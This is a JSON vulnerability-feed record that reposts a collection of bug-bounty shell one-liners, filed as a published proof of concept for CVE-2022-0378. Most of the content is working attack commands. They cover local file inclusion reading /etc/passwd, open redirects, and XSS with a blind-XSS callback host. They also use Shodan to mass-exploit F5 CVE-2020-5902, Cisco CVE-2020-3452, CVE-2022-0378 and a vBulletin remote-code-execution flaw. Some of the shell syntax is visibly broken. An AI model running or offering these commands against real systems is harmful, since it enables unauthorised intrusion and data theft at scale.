{"uuid": "5df5980b-2039-4e40-9785-80ec3e76b5f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/Secur_information_technology/50", "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'\n\n`bash\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n\n### XSS\n> @cihanmehmet\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n\n### CVE-2022-0378\n\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs \"onmouse\" && echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files", "creation_timestamp": "2024-05-19T19:36:04.000000Z"}